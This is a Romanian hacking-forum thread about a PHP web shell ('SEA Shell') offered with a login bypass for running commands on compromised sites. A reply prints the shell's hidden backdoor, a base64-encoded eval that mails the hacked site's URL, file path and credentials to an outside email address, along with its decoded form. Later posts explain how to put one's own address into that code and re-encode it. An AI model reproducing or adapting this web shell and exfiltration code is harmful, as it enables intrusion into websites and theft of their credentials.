MadAgent Posted August 19, 2014 Report Share Posted August 19, 2014 Login bypass Exploit -> poti executa comenzi trimitand parametrii prin post sau GETExamplu:SyRiAn Electronic Army Shell :: SEA ShellBypass:SyRiAn Electronic Army Shell :: SEA ShellMai vezi si panoul de comanda, deci nu te mai complici sa dai ca Dorel prin GET si POST... Quote Link to comment Share on other sites More sharing options...
Nytro Posted August 19, 2014 Report Share Posted August 19, 2014 Backdoor: <?php eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0=')); ?>Adica:$site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "sattia34@gmail.com";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = mail($to, $subject, $message, $header);echo "";exit;} Quote Link to comment Share on other sites More sharing options...
CocolinoRST Posted August 19, 2014 Report Share Posted August 19, 2014 (edited) L-am gasit pe net nu aveam habar ca are Backdoor nici nu prea am fost curios sa il inspectez.. Edited September 24, 2014 by CocolinoRST Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted August 19, 2014 Active Members Report Share Posted August 19, 2014 Pai l-am gasit pe net si am zis sa il impartasesc cu useri RST, chiar nu am vazut ca e backdoor sau ceva.. Ce este un backdoor imi poate explica si mie cineva? Poate fi vreun virus, adica eu am luat acel virus? Sau un backdoor este un virus cu care afli datele de pe un site anume?Daca tu bagi un shell intr-un site , dezvoltaturul shellului sau vreun gigel , are si el acces la acel shell Quote Link to comment Share on other sites More sharing options...
CocolinoRST Posted August 19, 2014 Report Share Posted August 19, 2014 (edited) Multumesc pentru raspuns. Edited September 24, 2014 by CocolinoRST Quote Link to comment Share on other sites More sharing options...
nonimporta Posted August 19, 2014 Report Share Posted August 19, 2014 Tu nu ai fost infectat cu nimic dar siteul pe care ai urcat shelul este compromis de doua ori,odata de tine si inca o data de cel care a pus acel backdoor.Este o practica des intalnita la diverse programe de hacking /scanere etc ca cel care le face sa se asigure ca profita la maxim de pe urma lor. Quote Link to comment Share on other sites More sharing options...
CocolinoRST Posted August 20, 2014 Report Share Posted August 20, 2014 Multumesc pentru informatii. Quote Link to comment Share on other sites More sharing options...
Scorpionadi Posted August 21, 2014 Report Share Posted August 21, 2014 Din curiozitate, nu se poate modifica acest shell pentru a nu mai fi backdoor?din cate am inteles este un shell destul de bun si cred ca cei care se pricep la php pot face unele modificari Quote Link to comment Share on other sites More sharing options...
quadxenon Posted August 21, 2014 Report Share Posted August 21, 2014 Nu o fi de ajuns sa stergi partea de cod ce a aratat-o Nytro ? Quote Link to comment Share on other sites More sharing options...
dr.d3v1l Posted August 22, 2014 Report Share Posted August 22, 2014 iei codul dai un decode base 64 $site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "masteritaliano@outlook.it";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = @mail($to, $subject, $message, $header);echo "";exit;}dupa faci encode base 64 si in bagi acolo Quote Link to comment Share on other sites More sharing options...
quadxenon Posted August 22, 2014 Report Share Posted August 22, 2014 iei codul dai un decode base 64 $site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "masteritaliano@outlook.it";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = @mail($to, $subject, $message, $header);echo "";exit;}dupa faci encode base 64 si in bagi acolo Sa nu uiti intai in loc de masteritaliano@outlook.it sa pui sugi.pula@lammere.com si apoi sa faci encode in base64. Quote Link to comment Share on other sites More sharing options...
CocolinoRST Posted August 22, 2014 Report Share Posted August 22, 2014 Stergi frumusel partea de cod care a zis Nytro ca este backdoor.Ce poate fi mai simplu de atat? Quote Link to comment Share on other sites More sharing options...
Sphere Posted August 25, 2014 Report Share Posted August 25, 2014 Acum doua zile nu stiai ce e un backdoor si intrebai daca te-a virusat shell-ul php iar acum stii si cum se scoate. Nu-i asa ca esti dubios ?P.S. DUBIÓS adj. 1. v. nesigur. 2. v. suspect. 3. echivoc, îndoielnic, necurat, suspect Quote Link to comment Share on other sites More sharing options...
CocolinoRST Posted September 24, 2014 Report Share Posted September 24, 2014 Cum spui tu, poate eu m-am documentan pe parcurs.. Dar cum spui tu sunt atat de Dubios, daca dai un search pe google ai sa vezi ca sunt si cautat de N.A.S.A.. Frate glumele proaste gen astea facute de tine nu isi au rostul intelegi? Nu mai are voie omul sa intrebe ca sare un baiat cu gura, si stai calm ca eu i-am zis ce a zis Nytro deci ce era asa greu sa citesc ce a zis Nytro si sa spun aici? Quote Link to comment Share on other sites More sharing options...